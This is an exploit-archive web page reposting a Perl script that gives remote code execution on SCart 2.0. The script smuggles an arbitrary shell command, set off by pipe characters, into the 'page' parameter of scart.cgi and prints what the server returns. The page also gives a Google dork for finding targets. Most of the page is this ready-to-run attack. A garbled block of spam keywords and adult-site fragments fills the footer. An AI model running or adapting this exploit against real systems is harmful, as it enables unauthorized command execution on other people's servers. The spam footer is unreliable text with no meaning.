about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SCart 2.0 (page) Remote Code Execution Exploit



2006-06-04 SCart 2.0 (page) Remote Code Execution Exploit
Rated as : High Risk

#!/usr/bin/perl
##
#     SCart 2.0 Remote Code Execution Exploit
#          Bugs Found & code By K-159
#               
## base on advisory at
http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#   
#  echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site: scartserver.com
#
# Greetz: my soul
mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use IO::Socket;
use LWP::Simple;

sub Usage {
print STDERR "\n
========================================================= \r\n";
print STDERR "      *SCart 2.0 Remote Code Execution Exploit*
\r\n";
print STDERR "                Bugs Found by K-159 \r\n";
print STDERR "         www.echo.or.id #e-c-h-o irc.dal.net
\r\n";
print STDERR "        Usage: $0 <www.target.com> </path/>
\"cmd\" \r\n";
print STDERR
"=============================================================
\r\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/scart.cgi?action=show_page&base=
base2.html&page=browse.txt|$command|");

if (defined $result) {
print $result;
}
else {
print "Exploit Failed.\n";
} 


securitydot.net - 2006-06-04

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 23:58:49 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
.;;;;;;;;; phpBB SQL 9pfs Sexgalery. [url= http www.pmly.n nice breas Naked girl holidays i cbtdc.com. hot black www.tongjo sexi wallp fc1 Free arab www.axin99 sexi wallp mall.hoto7 Tarsan com cosmus 116 csd www.nd5566 OF -169 FO skins/adva bule films news for c www.nd5566 t746t Www.dirtyr 2.6.9-67 PAUL www.tuwen1 Wap4sex.co XXX Com Girls fuck www.caoxue 7200 3.4.6 120ask.com linux 2.4. www.slim-t www.yiqiya linux ptra linux 3.1 fucking pu www.leleca www.ml77.c www.kuaile www.hegumi